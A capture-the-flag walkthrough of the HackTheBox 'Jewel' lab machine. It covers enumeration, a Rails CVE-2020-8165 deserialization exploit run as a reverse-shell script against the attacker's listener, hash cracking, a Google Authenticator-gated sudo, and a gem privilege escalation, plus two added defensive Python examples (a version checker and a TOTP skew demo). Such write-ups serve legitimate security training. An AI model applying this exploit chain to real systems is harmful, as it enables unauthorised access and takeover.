Jewel Walkthrough
Last updated
Hey Everyone! Today we have one of the HackTheBox machines, "Jewel". It's a medium machine and its exploitation process depends on a CVE. Before we get started, let's see its info.
As the first step, we will try to enumerate the box to collect information like:
Open ports
Hidden directories, parameter discovery, leaked secrets, etc. "If we have a website"
Security modes for all servers and ports
So, we will start with Nmap
nmap -A -T4 10.10.10.211
We have 3 open ports: 22, 8000 and 8080.
It seems that we have 2 websites working on ports 8000 and 8080, so let's check them.
http://10.10.10.211:8080
We have a webpage with the http-title Bl0G. Let's check the second one
http://10.10.10.211:8000
It redirects us to http://10.10.10.211:8000/gitweb, and after searching for what gitweb is, I've found this result.
I know that I have access to read or write the Bl0G repos, so let's check the files to try to find any secrets or other information.
After spending a little time searching for any juicy file name (database/login/users or any other keyword), I've found these results.
And for files...
I know that the Bl0G website works on the Rails framework, and I also have an SQL file; after checking it...
I have 2 usernames and 2 hashes. I've tried to crack them using hashcat, but it fails, so I think it's a rabbit hole :(
But anyway, let's save them into a file and continue our enumeration.
After searching for the Rails version, I've found that it works on Rails 5.2.2.1.
After searching for RCE CVEs for this version, I've found CVE-2020-8165.
Okay, let's try to exploit it...
After searching for any public exploit:
A deserialization of untrusted data vulnerability exists in Rails < 5.2.4.3 and Rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore, potentially resulting in RCE.
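A quick way to tell whether an application's pinned Rails release falls inside the affected range named above is to read its Gemfile.lock and compare the version against the first fixed release of each branch (5.2.4.3 and 6.0.3.1). The script below is an added example, not code from the write-up or from the Rails project; the Gemfile.lock content is constructed and simply pins the version found on this box.

```python
"""Check a Gemfile.lock for a Rails release affected by CVE-2020-8165.

Added example (not from the original write-up). The fixed versions are the
ones the advisory text above names; the lock file content is constructed.
"""
import re

# First fixed release on each affected branch, per the advisory text.
FIXED = {5: (5, 2, 4, 3), 6: (6, 0, 3, 1)}

# Constructed sample lock file pinning the version found on the box.
SAMPLE_LOCK = """\
GEM
  remote: https://rubygems.org/
  specs:
    rails (5.2.2.1)
      actioncable (= 5.2.2.1)
      activesupport (= 5.2.2.1)
    redis (4.2.1)
"""


def parse_version(text):
    """Turn '5.2.2.1' into a tuple (5, 2, 2, 1) so versions compare numerically."""
    return tuple(int(part) for part in text.split("."))


def rails_version(lockfile_text):
    """Return the rails version pinned in a Gemfile.lock, or None if absent.

    Top-level gems in the specs section are indented by exactly four spaces;
    their dependencies are indented further, so they do not match here.
    """
    match = re.search(r"^ {4}rails \(([\d.]+)\)", lockfile_text, re.M)
    return match.group(1) if match else None


def is_affected(version_text):
    """True when the version is older than the fixed release of its branch.

    Anything below 5.x predates the 5.2 series and is counted as affected;
    majors above 6 are newer than both fixes and counted as fixed.
    """
    version = parse_version(version_text)
    major = version[0]
    if major < 5:
        return True
    if major > 6:
        return False
    return version < FIXED[major]


def check_lock(lockfile_text):
    """Return (version, affected) for the rails gem in a lock file."""
    version = rails_version(lockfile_text)
    if version is None:
        return None, False
    return version, is_affected(version)


if __name__ == "__main__":
    version, affected = check_lock(SAMPLE_LOCK)
    print(f"rails {version}: {'AFFECTED' if affected else 'fixed'}")
```

Run against a real lock file by reading it into `check_lock`; a result of `AFFECTED` means the cache-store deserialization fix is missing and the application should be upgraded to at least 5.2.4.3 or 6.0.3.1.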
Generate a payload from this repo
Use this payload to change your username
Refresh the /articles page to show your payload name
For the first one, I had problems with the Ruby version, since it requires a specific version to run the exploit. To save time I used the second one, which is written in Python for this machine, and it will exploit it as well.
After checking the exploit code to know how it works, here are the exploit arguments:
python3 rev.py 10.10.xx.xx port
After trying to execute it, I faced a problem with a hex character, so I added a line to encode it.
Let's run it and listen on our port using netcat.
It works and we get the user flag.
For now, I need to enumerate this box to find any important info which could lead me to the root account. So instead of searching and enumerating the box manually command by command, I used LinPEAS, an automation tool which helps you find sensitive info and enumerate the server.
After using it, I've found these hashes.
And after enumerating the backup file in /var/backups/dump_2020_08_27.sql, I've found another hash. For now, I have 3 hashes, plus the 2 from the first enumeration step.
Let's try to break them all using hashcat or john.
As you can see, john cracked one of them, and we have a password: spongebob
I've tried to use this password for the root account, but it fails.
Let's check our home directory.
We have a google_authenticator code, which seems interesting.
I've tried to check my privileges by typing sudo -l, but it requires a password, which is spongebob, and the Google Authenticator verification code.
So, I've used a Google Authenticator online service to generate the verification code, as you can see.
And type sudo -l, inserting the password and the code.
Note: Your machine timezone MUST be the same as the server timezone "This is the mechanism by which Google Authenticator works".
If the timezones aren't the same, the code will have expired for the server while it is still active for your machine. Here's the point!!
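To show why the two clocks must agree, here is a TOTP implementation in the style Google Authenticator uses (RFC 6238: HMAC-SHA1, 30-second steps, 6 digits, base32 secret). This is an added example, not code from the write-up; the secret is the RFC 6238 test key rather than anything from the box. The counter is derived from the Unix timestamp, so a client whose clock disagrees with the server's computes a code for a different time step, which a server that only tolerates one step of drift rejects.

```python
"""Generate and verify TOTP codes (RFC 6238) to show why clock agreement matters.

Added example, not from the original write-up. RFC_SECRET is the RFC 6238
SHA-1 test key; the window and step values mirror Google Authenticator's
defaults.
"""
import base64
import hashlib
import hmac
import struct

STEP = 30  # seconds per time step


def hotp(secret, counter, digits=6):
    """HMAC-SHA1 one-time password for a single counter value (RFC 4226)."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    truncated = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(truncated % (10 ** digits)).zfill(digits)


def totp(secret, unix_time, digits=6):
    """TOTP: the counter is the number of STEP-second intervals since the epoch.

    Only the Unix timestamp feeds the counter, so a clock that is off from
    the server's (drift or a mis-set time) yields a code for another step.
    """
    return hotp(secret, int(unix_time) // STEP, digits)


def verify(secret, code, server_time, window=1, digits=6):
    """Server-side check: accept the current step and +/- `window` steps."""
    counter = int(server_time) // STEP
    return any(
        hmac.compare_digest(hotp(secret, counter + delta, digits), code)
        for delta in range(-window, window + 1)
    )


def secret_from_base32(text):
    """Decode a base32 secret of the kind stored in ~/.google_authenticator."""
    padded = text.upper() + "=" * (-len(text) % 8)
    return base64.b32decode(padded)


RFC_SECRET = b"12345678901234567890"  # RFC 6238 SHA-1 test key


def skew_demo(secret, server_time, skew_seconds):
    """Does a code from a client clock offset by skew_seconds pass on the server?"""
    client_code = totp(secret, server_time + skew_seconds)
    return verify(secret, client_code, server_time)


if __name__ == "__main__":
    now = 1111111109  # an RFC 6238 test timestamp
    print(totp(RFC_SECRET, now, digits=8))  # 07081804 per RFC 6238
    print(skew_demo(RFC_SECRET, now, 0))  # True: clocks agree
    print(skew_demo(RFC_SECRET, now, 3600))  # False: one hour of skew
```

The `verify` function is what a PAM module or web service does on its side; the narrow window is deliberate, since every extra step accepted gives a guessed or replayed code a longer useful life, which is why the fix for a rejected code is to synchronise the clock (NTP) rather than widen the server's tolerance.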
After checking our privileges with sudo -l, I have permission to execute /usr/bin/gem as root without a password.
After searching for how to escape from gem, I've found this resource.
You have 3 ways to open a shell from gem; you can use any one of them.
I've used the first one, and it opens a root shell.